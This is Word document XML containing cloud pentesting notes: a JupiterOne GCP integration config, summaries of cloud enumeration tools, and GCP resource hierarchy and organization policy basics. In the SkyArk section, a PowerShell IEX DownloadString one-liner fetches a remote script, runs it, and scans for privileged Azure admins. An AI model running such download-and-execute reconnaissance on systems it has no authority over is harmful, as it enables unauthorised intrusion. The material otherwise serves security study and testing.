    <w:p w14:paraId="51CE62CA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### It requires service account credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B0BB3E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</w:p>
    <w:p w14:paraId="180C2DE4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integrations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26493AC1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625FB70F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name: graph-google-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cloud</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CFE961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instanceId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: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testInstanceId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DD0A974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directory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: .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/.integrations/graph-google-cloud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69018A59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gitRemoteUrl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: https://github.com/JupiterOne/graph-google-cloud.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2575E9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config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672955F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SERVICE_ACCOUNT_KEY_FILE: '{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D3DB58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PROJECT_ID: ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5592870C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FOLDER_ID: ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7153CD8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ORGANIZATION_ID: ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37005251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CONFIGURE_ORGANIZATION_PROJECTS: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false</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2262AF9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EF6F63E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storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23517FD1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engine: neo4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A13FDC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config: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1B809D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username: neo4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321C88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password: s3cr3t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12168D1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uri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: bolt://localhost:7687</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062F0E4A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#Consider using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host.docker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.internal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if from docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C064A58" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="09E2402A" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="67E503DD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hyperlink r:id="rId23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:br/>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-3"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>SkyArk</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57D21903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Discover the most privileged users in the scanned AWS or Azure environment, including the AWS Shadow Admins. It uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>powershell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32167F3A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241BA692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Import-Module .\SkyArk.ps1 -force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D1E1FD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Start-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AzureStealth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35D79488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A69F548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in the Cloud Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF396C2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IEX (New-Object Net.WebClient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).DownloadString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('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EB74E1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Scan-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AzureAdmins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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EFC4DE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hyperlink r:id="rId24" w:history="1"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Cloud Brute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6460260E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 tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>DigitalOcean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, Alibaba, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Vultr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Linode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A0C3C5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hyperlink r:id="rId25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CloudFox</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D8350DB" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA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CloudFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS &amp; Azure supported with GCP upcoming).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1B7CD" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA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is an enumeration tool which is intended to compliment manual </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>pentesting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3FB50FEF" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA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doesn't create or modify any data within the cloud environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20312336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More lists of cloud security tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18208ADD" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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26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https://github.com/RyanJarv/awesome-cloud-sec</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D76F183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74C20C13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337BF543" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRP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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB50AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357CCEED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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB50AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>GCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A075A9C" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRPr="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB50AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">GCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB50AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72BD5AAD" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRPr="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA"/>
    <w:p w14:paraId="58DC3CD9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lastRenderedPageBreak/>
        <w:t>Basic Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14173623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Before start </w:t>
      </w:r>
      <w:proofErr w:type="spell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pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> a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GCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment, there are a few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basics things you need to know</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> about how it works to help you understand what you need to do, how to find misconfigurations and how to exploit them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5984A65E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Concepts such as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organization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> hierarchy,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permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and other basic concepts are explained in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888C10B" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA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>GCP - Basic Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39657AB4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Resource hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05212F6C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Google Cloud uses a </w:t>
      </w:r>
      <w:hyperlink r:id="rId27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Resource hierarchy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65250884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At a high level, it looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C49854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914A95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Organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B0DB0C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--&gt; Folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D04BE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--&gt; Projects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FCB029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--&gt; Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FF0D87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virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B6DED2" w14:textId="0764B5D8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43560E5C" wp14:editId="3C258B7B">
            <wp:extent cx="5583555" cy="7412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74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CBA0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hyperlink r:id="rId29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https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1626687C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Projects Migration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8308BB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It's possible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migrate a project without any organization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an organization with the permissions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>roles/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resourcemanager.projectCreator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>roles/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resourcemanager.projectMover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the project is inside other organization, it's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">needed to contact GCP support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move them out of the organization first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. For more info check </w:t>
      </w:r>
      <w:hyperlink r:id="rId30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this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6FF2C3CC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Organization Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4E6F75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Allow to centralize control over your organization's cloud resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16A935" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Centralize control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configure restrictions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> on how your organization’s resources can be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73661797" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Define and establish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guardrails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> for your development teams to stay within compliance boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA3E4AE" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Help project owners and their teams move quickly without worry of breaking compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088C58B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These policies can be created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affect the complete organization, folder(s) or project(s)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. Descendants of the targeted resource hierarchy node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inherit the organization policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0F59A2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order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define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> an organization policy,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you choose a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:anchor="constraints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constraint</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a particular type of restriction against either a Google Cloud service or a group of Google Cloud services.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configure that constraint with your desired restrictions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EE8A85" w14:textId="680615B1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5771A69A" wp14:editId="26BAD18F">
            <wp:extent cx="5731510" cy="4207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F519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hyperlink r:id="rId33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https://cloud.google.com/resource-manager/img/org-policy-concepts.svg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="637B7F52" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50A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  <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Common use cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D05252" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Limit resource sharing based on domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F2CBFC" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Limit the usage of Identity and Access Management service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288653B" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Restrict the physical location of newly created resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A04461" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Disable service account </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>creation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="606BFCB3" w14:textId="6EFC39B3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3E115137" wp14:editId="11E73C2D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5976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There are many more constraints that give you fine-grained control of your organization's resources. For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more information, see the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35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list of all Organization Policy Service constraints</w:t>
        </w:r>
      </w:hyperlink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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6D610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Default Organization Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF079F" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>These are the policies that Google will add by default when setting up your GCP organization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05341025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Access Management Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395C0374" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Domain restricted contacts:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents adding users to Essential Contacts outside your specified domains. This limits Essential Contacts to only allow managed user identities in your selected domains to receive platform notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD52D5" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Domain restricted sharing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents adding users to IAM policies outside your specified domains. This limits IAM policies to only allow managed user identities in your selected domains to access resources inside this organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F791E" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Public access prevention:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents Cloud Storage buckets from being exposed to the public. This ensures that a developer can't configure Cloud Storage buckets to have unauthenticated internet access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B62F2B" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Uniform bucket level access:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents object-level access control lists (ACLs) in Cloud Storage buckets. This simplifies your access management by applying IAM policies consistently across all objects in Cloud Storage buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633C5218" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Require OS login:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VMs created in new projects will have OS Login enabled. This lets you manage SSH access to your instances using IAM without needing to create and manage individual SSH keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C265BE1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rPr>
          <w:rStyle w:val="Strong"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Additional security policies for service accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069F9591" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Disable automatic IAM grants</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Prevents the default App Engine and Compute Engine service accounts from automatically being granted the Editor IAM role on a project at creation. This ensures service accounts don't receive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>overly-permissive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IAM roles upon creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33399273" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Disable service account key creation</w:t>
      </w:r>
      <w:r>
        <w:t>: Prevents the creation of public service account keys. This helps reduce the risk of exposing persistent credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B41726" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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lastRenderedPageBreak/>
        <w:t>Disable service account key upload</w:t>
      </w:r>
      <w:r>
        <w:t>: Prevents the uploading of public service account keys. This helps reduce the risk of leaked or reused key material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E8F0B0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rPr>
          <w:rStyle w:val="Strong"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Secure VPC network configuration policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30664849" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Define allowed external IPs for VM instances</w:t>
      </w:r>
      <w:r>
        <w:t>: Prevents the creation of Compute instances with a public IP, which can expose them to internet traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEFE2C6" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Disable VM nested virtualization</w:t>
      </w:r>
      <w:r>
        <w:t>: Prevents the creation of nested VMs on Compute Engine VMs. This decreases the security risk of having unmonitored nested VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB9FFF" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Disable VM serial port:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents serial port access to Compute Engine VMs. This prevents input to a server’s serial port using the Compute Engine API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B95B9DB" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Restrict authorized networks on Cloud SQL instances:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents public or non-internal network ranges from accessing your Cloud SQL databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A07AD3A" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Restrict Protocol Forwarding Based on type of IP Address:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents VM protocol forwarding for external IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D330E" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Restrict Public IP access on Cloud SQL instances:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents the creation of Cloud SQL instances with a public IP, which can expose them to internet traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEC87A3" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Restrict shared VPC project lien removal:</w:t>
      </w:r>
      <w:r>
